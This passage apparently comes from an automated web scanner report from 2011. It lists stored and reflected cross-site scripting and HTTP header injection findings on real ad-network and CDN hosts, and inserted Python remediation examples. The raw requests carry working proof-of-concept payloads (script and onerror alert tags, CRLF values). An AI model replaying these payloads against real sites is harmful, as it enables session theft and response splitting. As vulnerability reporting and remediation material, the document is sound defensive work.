Referer: http://www.scribd.com/embeds/63688924/content?start_page=1&view_mode=list&access_key=key-2mw49i3od1t7hxagubzd
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vaguid=172d38ad2d9b9b5aa42030c637b398394a902<script>alert(1)</script>1bb5b69e467

Request 2

GET /v1/beacons/initialize?u=undefined&sg=6e1ea1b081dc6743bbe3537728eca43d HTTP/1.1
Host: rma-api.gravity.com
Proxy-Connection: keep-alive
Referer: http://www.scribd.com/embeds/63688924/content?start_page=1&view_mode=list&access_key=key-2mw49i3od1t7hxagubzd
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vaguid=172d38ad2d9b9b5aa42030c637b39839

Response 2

HTTP/1.1 200 OK
Server: ""
P3P: CP="NOI DSP COR ADMa OUR NOR"
Content-Type: text/javascript;charset=UTF-8
Content-Length: 111
Date: Sun, 04 Sep 2011 01:01:00 GMT
Connection: close
Set-Cookie: vaguid=172d38ad2d9b9b5aa42030c637b398394a902<script>alert(1)</script>1bb5b69e467; Domain=.gravity.com; Expires=Sat, 05-May-2063 02:02:00 GMT; Path=/

GravityInsights.cc('grvinsights', '172d38ad2d9b9b5aa42030c637b398394a902<script>alert(1)</script>1bb5b69e467');

3.2. http://snas.nbcuni.com/snas/api/getRemoteDomainCookies [JSESSIONID cookie]

Summary

Severity:   High
Confidence:   Certain
Host:   http://snas.nbcuni.com
Path:   /snas/api/getRemoteDomainCookies

Issue detail

The value of the JSESSIONID cookie submitted to the URL /snas/api/getRemoteDomainCookies is copied, unencoded, into the response body. The payload a8502<script>alert(1)</script>e55be4f7c60 was submitted in the JSESSIONID cookie; the server re-issued the tainted value (Set-Cookie in Response 2) and returned it unmodified in a subsequent request that carried only the original session id.

The reflection point is a JSON string inside a JSONP call (__nbcsnasadops.doSCallback({ "cookie":{"JSESSIONID":"..."}});), but the response is served as text/html rather than as script, so a browser that navigates to the URL directly parses the body as HTML and executes the injected tag: for a direct visit the scanner's claim of arbitrary JavaScript does hold. Two points for the reviewer: the attacker must first be able to plant a JSESSIONID cookie in the victim's browser for snas.nbcuni.com (cookie injection from a sibling nbcuni.com host, or a network position on plain HTTP), which this report does not test; and the callback parameter is echoed verbatim as the function name, which is the more usual reflected vector for a JSONP endpoint and was not tested here. The endpoint's purpose, handing session cookie values to a script on another domain, is worth reviewing on its own.

Request 1

GET /snas/api/getRemoteDomainCookies?callback=__nbcsnasadops.doSCallback HTTP/1.1
Host: snas.nbcuni.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=C58B4400F3879E26517C8A2E3ECF06E2a8502<script>alert(1)</script>e55be4f7c60

Request 2

GET /snas/api/getRemoteDomainCookies?callback=__nbcsnasadops.doSCallback HTTP/1.1
Host: snas.nbcuni.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=C58B4400F3879E26517C8A2E3ECF06E2

Response 2

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:53:42 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8b DAV/2 mod_jk/1.2.30
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Set-Cookie: JSESSIONID=C58B4400F3879E26517C8A2E3ECF06E2a8502<script>alert(1)</script>e55be4f7c60; Path=/
Cache-Control: max-age=10
Expires: Sun, 04 Sep 2011 00:53:52 GMT
Content-Length: 131
Content-Type: text/html

__nbcsnasadops.doSCallback({ "cookie":{"JSESSIONID":"C58B4400F3879E26517C8A2E3ECF06E2a8502<script>alert(1)</script>e55be4f7c60"}});

4. HTTP header injection
There are 3 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.
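An added example, in Python, that is not part of the report and not the code of any site listed in this section: a naive redirect and Set-Cookie builder of the shape seen in 4.1 to 4.3, the control-character and cookie-octet checks the remediation calls for, a percent-encoding alternative for Location where the value cannot simply be refused, and a lenient header parser that makes the split visible. The injected value, the header names and the builders are constructed for the example; the cookie values in the usage note are the report's own.

```python
import re
from urllib.parse import quote


class HeaderInjection(ValueError):
    """Raised when user data would break out of a header field."""


# Any octet below 0x20 (and DEL) is rejected, as the remediation requires;
# CR and LF are the ones that actually split the header section.
_CTL_RE = re.compile(r"[\x00-\x1f\x7f]")
# RFC 6265 cookie-octet: printable US-ASCII except CTLs, space, " , ; and \.
_COOKIE_OCTETS_RE = re.compile(r"^[\x21\x23-\x2b\x2d-\x3a\x3c-\x5b\x5d-\x7e]*$")


def check_header_value(value: str) -> str:
    """Return value unchanged, or raise if it contains a control character."""
    if _CTL_RE.search(value):
        raise HeaderInjection("control character in header value: %r" % value)
    return value


def check_cookie_value(value: str) -> str:
    """Stricter rule for Set-Cookie: only RFC 6265 cookie-octets are allowed."""
    if not _COOKIE_OCTETS_RE.match(value):
        raise HeaderInjection("illegal octet in cookie value: %r" % value)
    return value


def is_rejected(check, value: str) -> bool:
    """Does the given check refuse this value? (Convenience for callers/tests.)"""
    try:
        check(value)
    except HeaderInjection:
        return True
    return False


def encode_for_location(url: str) -> str:
    """Alternative to outright rejection when a URL must be echoed: percent-
    encode everything outside the URL character set, so CR/LF can only ever
    appear as %0D%0A. This does not vet the target host; an attacker-chosen
    absolute URL in Location is a separate (open redirect) problem."""
    return quote(url, safe=":/?#[]@!$&'()*+,;=%")


def build_redirect(target: str, hardened: bool) -> bytes:
    """Constructed 302 builder in the shape of finding 4.1. Unhardened, the
    redirect value is copied verbatim; hardened, control characters are refused."""
    location = check_header_value(target) if hardened else target
    msg = ("HTTP/1.1 302 Found\r\n"
           f"Location: {location}\r\n"
           "Content-Length: 0\r\n\r\n")
    return msg.encode("latin-1")


def build_set_cookie(name: str, value: str, hardened: bool) -> str:
    """Constructed Set-Cookie line in the shape of findings 4.2 and 4.3."""
    if hardened:
        value = check_cookie_value(value)
    return f"Set-Cookie: {name}={value}; path=/"


def parse_header_block(raw: bytes) -> list:
    """Split a response the way a lenient proxy does, so an injected CRLF shows
    up as an additional (name, value) field rather than as part of the first."""
    head, _, _body = raw.partition(b"\r\n\r\n")
    fields = []
    for line in head.decode("latin-1").split("\r\n")[1:]:   # skip status line
        name, sep, value = line.partition(":")
        fields.append((name.strip(), value.strip()) if sep else (line.strip(), ""))
    return fields
```

Fed the 4.2 payload 5acac\r\n221f811ccdb, check_cookie_value() refuses it, while the legitimate N value 2:b2269f69029173967deb3f16e3a72f92 passes; with an unhardened build_redirect() the constructed value ...?id=f90fe\r\nSet-Cookie: injected=1 parses back as two header fields, which is the split the Location header in 4.1 exhibits.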


4.1. http://m.xp1.ru4.com/activity [redirect parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://m.xp1.ru4.com
Path:   /activity

Issue detail

The value of the redirect request parameter is URL-decoded and copied into the Location response header. The payload f90fe%0d%0a7e63346a2ba was submitted in the redirect parameter; the decoded CR LF survives in the header, so the response contains an injected line (the ~uk~ token in the submitted URL was also expanded by the server into an identifier before the value was written, which does not affect the injection). Since the redirect parameter is an attacker-supplied absolute URL copied into Location, the same endpoint also behaves as an open redirect, which the scanner does not report separately.

Request

GET /activity?_o=62795&_t=cm_admeld&redirect=http%3A%2F%2Ftag.admeld.com%2Fmatch%3F%26admeld_adprovider_id=303%26external_user_id=%7euk%7ef90fe%0d%0a7e63346a2ba&admeld_user_id=14c82149-9fc3-4277-af4b-df6e89b3fc47&admeld_adprovider_id=303&admeld_call_type=redirect&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: m.xp1.ru4.com
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun-Java-System-Web-Server/7.0
Date: Sun, 04 Sep 2011 00:56:34 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Pragma: no-cache
Location: http://tag.admeld.com/match?&admeld_adprovider_id=303&external_user_id=BO-00000000670935830f90fe
7e63346a2ba
&admeld_user_id=14c82149-9fc3-4277-af4b-df6e89b3fc47&admeld_adprovider_id=303&admeld_call_type=redirect&admeld_callback=http://tag.admeld.com/match
Content-length: 0
X-Cnection: close


4.2. http://tacoda.at.atwola.com/rtx/r.js [N cookie]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tacoda.at.atwola.com
Path:   /rtx/r.js

Issue detail

The value of the N cookie is copied into the Set-Cookie response header. The payload 5acac%0d%0a221f811ccdb was submitted in the N cookie. This caused a response containing an injected HTTP header.

Request

GET /rtx/r.js?cmd=LCN&si=11684&pi=-&xs=3&pu=http%253A//blogs.sacbee.com/the_state_worker/%2523navlink%253Dnavdrop%253Fifu%253Dhttp%25253A//www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html&df=1&v=6.0&cb=78634 HTTP/1.1
Host: tacoda.at.atwola.com
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATTACID=a3Z0aWQ9MTc2NWlmdTFha2tjNzk=; ANRTT=; Tsid=0^1315097086^1315098886|17778^1315097086^1315098886; TData=99999|^; N=2:b2269f69029173967deb3f16e3a72f925acac%0d%0a221f811ccdb; ATTAC=a3ZzZWc9OTk5OTk6; eadx=x

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:07:33 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Cache-Control: max-age=900
Expires: Sun, 04 Sep 2011 01:22:33 GMT
Set-Cookie: ATTACID=a3Z0aWQ9MTc2NWlmdTFha2tjNzk=; path=/; expires=Wed, 29-Aug-12 01:07:33 GMT; domain=.at.atwola.com
Set-Cookie: ANRTT=; path=/; expires=Sun, 11-Sep-11 01:07:33 GMT; domain=tacoda.at.atwola.com
Set-Cookie: Tsid=0^1315097086^1315100253|17778^1315097086^1315098886|11684^1315098448^1315100253; path=/; expires=Sun, 04-Sep-11 01:37:33 GMT; domain=tacoda.at.atwola.com
Set-Cookie: TData=99999|^; expires=Wed, 29-Aug-12 01:07:33 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: N=2:b2269f69029173967deb3f16e3a72f925acac
221f811ccdb
,b2269f69029173967deb3f16e3a72f92; expires=Wed, 29-Aug-12 01:07:33 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: ATTAC=a3ZzZWc9OTk5OTk6; expires=Wed, 29-Aug-12 01:07:33 GMT; path=/; domain=.at.atwola.com
ntCoent-Length: 102
Content-Type: application/x-javascript
Content-Length: 102

var ANUT=1;
var ANOO=0;
var ANSR=1;
var ANTID='1765ifu1akkc79';
var ANSL='99999|^';
ANRTXR();


4.3. http://tacoda.at.atwola.com/rtx/r.js [si parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tacoda.at.atwola.com
Path:   /rtx/r.js

Issue detail

The value of the si request parameter is copied into the Set-Cookie response header. The payload fa8dd%0d%0afea8607b62f was submitted in the si parameter. This caused a response containing an injected HTTP header.

Request

GET /rtx/r.js?cmd=LCN&si=fa8dd%0d%0afea8607b62f&pi=-&xs=3&pu=http%253A//blogs.sacbee.com/the_state_worker/%2523navlink%253Dnavdrop%253Fifu%253Dhttp%25253A//www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html&df=1&v=6.0&cb=78634 HTTP/1.1
Host: tacoda.at.atwola.com
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATTACID=a3Z0aWQ9MTc2NWlmdTFha2tjNzk=; ANRTT=; Tsid=0^1315097086^1315098886|17778^1315097086^1315098886; TData=99999|^; N=2:b2269f69029173967deb3f16e3a72f92; ATTAC=a3ZzZWc9OTk5OTk6; eadx=x

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:06:35 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Cache-Control: max-age=900
Expires: Sun, 04 Sep 2011 01:21:35 GMT
Set-Cookie: ATTACID=a3Z0aWQ9MTc2NWlmdTFha2tjNzk=; path=/; expires=Wed, 29-Aug-12 01:06:35 GMT; domain=.at.atwola.com
Set-Cookie: ANRTT=; path=/; expires=Sun, 11-Sep-11 01:06:35 GMT; domain=tacoda.at.atwola.com
Set-Cookie: Tsid=0^1315097086^1315100195|17778^1315097086^1315098886|11684^1315098364^1315100193|fa8dd
fea8607b62f
^1315098395^1315100195; path=/; expires=Sun, 04-Sep-11 01:36:35 GMT; domain=tacoda.at.atwola.com
Set-Cookie: TData=99999|^; expires=Wed, 29-Aug-12 01:06:35 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: N=2:b2269f69029173967deb3f16e3a72f92,b2269f69029173967deb3f16e3a72f92; expires=Wed, 29-Aug-12 01:06:35 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: ATTAC=a3ZzZWc9OTk5OTk6; expires=Wed, 29-Aug-12 01:06:35 GMT; path=/; domain=.at.atwola.com
Cteonnt-Length: 102
Content-Type: application/x-javascript
Content-Length: 102

var ANUT=1;
var ANOO=0;
var ANSR=1;
var ANTID='1765ifu1akkc79';
var ANSL='99999|^';
ANRTXR();


5. Cross-site scripting (reflected)
There are 105 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences. First, input should be validated as strictly as possible on arrival, given the kind of content it is expected to contain: a product identifier such as those in the URL paths below should be short and alphanumeric, and input that fails validation should be rejected rather than sanitised. Second, user input should be encoded for the context into which it is copied at every point where it enters a response, replacing HTML metacharacters (< > " ' and =) with the corresponding entities; for responses that are not HTML at all, such as the text/plain error bodies in this section, an accurate Content-Type together with X-Content-Type-Options: nosniff stops browsers from reinterpreting the body as HTML. In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
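The two-layer remediation for both the stored (section 3) and reflected (section 5) findings, as an added Python example that is not part of the report and not any listed site's code. The encoders are per context, because the findings land in three different ones: HTML text (5.1 to 5.5), a JavaScript string literal (3.1) and a JSONP body served as text/html (3.2). The identifier pattern, the callback rule, the response headers and contains_markup() are assumptions made for this example; the payloads are the report's own.

```python
import html
import json
import re

# Reflection payloads taken from the report's findings, so the encoders are
# exercised on the exact strings the scanner used.
PAYLOAD_HTML_TEXT = "2fd86<img src=a onerror=alert(1)>af4802e2c43"   # 5.1
PAYLOAD_JS_STRING = "4a902<script>alert(1)</script>1bb5b69e467"      # 3.1
PAYLOAD_JSONP = "a8502<script>alert(1)</script>e55be4f7c60"          # 3.2

# Layer 1: validate on arrival. A beacon id, a session id or a product code is
# short and alphanumeric; anything else is rejected, not cleaned up. The
# pattern is an assumption for this example.
_IDENTIFIER_RE = re.compile(r"^[A-Za-z0-9_.:-]{1,128}$")


def is_valid_identifier(value: str) -> bool:
    return bool(_IDENTIFIER_RE.match(value))


# Layer 2: encode for the exact context the value lands in.

def encode_html_text(value: str) -> str:
    """Text between tags, or a quoted attribute value: & < > " ' -> entities."""
    return html.escape(value, quote=True)


def _escape_script_breakers(literal: str) -> str:
    """< > & written as \\uXXXX so no '</script>' can appear inside a script;
    U+2028/U+2029 are JS line terminators that JSON permits raw, so escape them."""
    for ch, esc in (("<", "\\u003c"), (">", "\\u003e"), ("&", "\\u0026"),
                    ("\u2028", "\\u2028"), ("\u2029", "\\u2029")):
        literal = literal.replace(ch, esc)
    return literal


def encode_js_string(value: str) -> str:
    """A JavaScript string literal, quotes included, e.g. f({encoded}).
    json.dumps yields a double-quoted literal with backslash and " escaped."""
    return _escape_script_breakers(json.dumps(value, ensure_ascii=False))


_CALLBACK_RE = re.compile(r"[A-Za-z_$][\w$]*(\.[A-Za-z_$][\w$]*)*")


def is_safe_callback(name: str) -> bool:
    """JSONP callback: a plain dotted identifier and nothing else."""
    return _CALLBACK_RE.fullmatch(name) is not None


def render_jsonp(callback: str, payload: dict) -> tuple:
    """Hardened JSONP response of the shape seen in 3.2: callback validated,
    body serialised with < > & escaped, and served as script with nosniff
    instead of as text/html, so a direct visit cannot render it as HTML."""
    if not is_safe_callback(callback):
        raise ValueError("callback is not a plain identifier")
    body = _escape_script_breakers(json.dumps(payload))
    headers = {"Content-Type": "application/javascript; charset=utf-8",
               "X-Content-Type-Options": "nosniff"}
    return headers, f"{callback}({body});"


def contains_markup(text: str) -> bool:
    """Post-condition for encoded output: no raw angle bracket may survive."""
    return "<" in text or ">" in text
```

Run against the report's payloads, every encoder's output fails contains_markup(); the JSONP renderer keeps the original callback name __nbcsnasadops.doSCallback but refuses anything that is not an identifier, which closes the untested callback vector noted under 3.2.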


5.1. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0026084b [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0026084b

Issue detail

The value of REST URL parameter 9 (the image identifier at the end of the path) is copied, unencoded, into the body of a 403 response whose Content-Type is text/plain. The payload 2fd86<img%20src%3da%20onerror%3dalert(1)>af4802e2c43 was submitted in REST URL parameter 9 and was echoed, URL-decoded, as 2fd86<img src=a onerror=alert(1)>af4802e2c43 in the response body.

The capture demonstrates unencoded reflection of HTML metacharacters; whether the event handler ever fires depends on the browser honouring the declared type. A browser that respects text/plain renders the body as text, so execution requires a client that sniffs the response as HTML or a context that loads it as a document; the response sends no X-Content-Type-Options: nosniff header, which would have closed the sniffing avenue. Note also that the reflection lands on the a1128.g.akamai.net origin rather than on proflowers.com, so script running here would not see proflowers.com cookies or session state. Findings 5.1 to 5.5 are the same reflection on the same origin with different product identifiers.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0026084b2fd86<img%20src%3da%20onerror%3dalert(1)>af4802e2c43?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: no-store
Date: Sun, 04 Sep 2011 01:06:42 GMT
Connection: close

Unable to find /ProvideCommerce/P0026084b2fd86<img src=a onerror=alert(1)>af4802e2c43

5.2. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0054242b [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0054242b

Issue detail

The value of REST URL parameter 9 is copied, unencoded, into the body of a text/plain 403 response. The payload 49c07<img%20src%3da%20onerror%3dalert(1)>86ab35ef3ef was submitted in REST URL parameter 9 and was echoed, URL-decoded, as 49c07<img src=a onerror=alert(1)>86ab35ef3ef in the response body.

This shows unencoded reflection on the a1128.g.akamai.net origin; whether the event handler runs depends on the response being interpreted as HTML rather than the declared text/plain, and no nosniff header is sent.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0054242b49c07<img%20src%3da%20onerror%3dalert(1)>86ab35ef3ef?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: no-store
Date: Sun, 04 Sep 2011 01:06:15 GMT
Connection: close

Unable to find /ProvideCommerce/P0054242b49c07<img src=a onerror=alert(1)>86ab35ef3ef

5.3. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0057916b [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0057916b

Issue detail

The value of REST URL parameter 9 is copied, unencoded, into the body of a text/plain 403 response. The payload 56b44<img%20src%3da%20onerror%3dalert(1)>5949f4937c0 was submitted in REST URL parameter 9 and was echoed, URL-decoded, as 56b44<img src=a onerror=alert(1)>5949f4937c0 in the response body.

This shows unencoded reflection on the a1128.g.akamai.net origin; whether the event handler runs depends on the response being interpreted as HTML rather than the declared text/plain, and no nosniff header is sent.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0057916b56b44<img%20src%3da%20onerror%3dalert(1)>5949f4937c0?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: no-store
Date: Sun, 04 Sep 2011 01:05:13 GMT
Connection: close

Unable to find /ProvideCommerce/P0057916b56b44<img src=a onerror=alert(1)>5949f4937c0

5.4. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0071881 [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0071881

Issue detail

The value of REST URL parameter 9 is copied, unencoded, into the body of a text/plain 403 response. The payload 30b2f<img%20src%3da%20onerror%3dalert(1)>5d12361a7b4 was submitted in REST URL parameter 9 and was echoed, URL-decoded, as 30b2f<img src=a onerror=alert(1)>5d12361a7b4 in the response body.

This shows unencoded reflection on the a1128.g.akamai.net origin; whether the event handler runs depends on the response being interpreted as HTML rather than the declared text/plain, and no nosniff header is sent.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P007188130b2f<img%20src%3da%20onerror%3dalert(1)>5d12361a7b4?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 84
Cache-Control: no-store
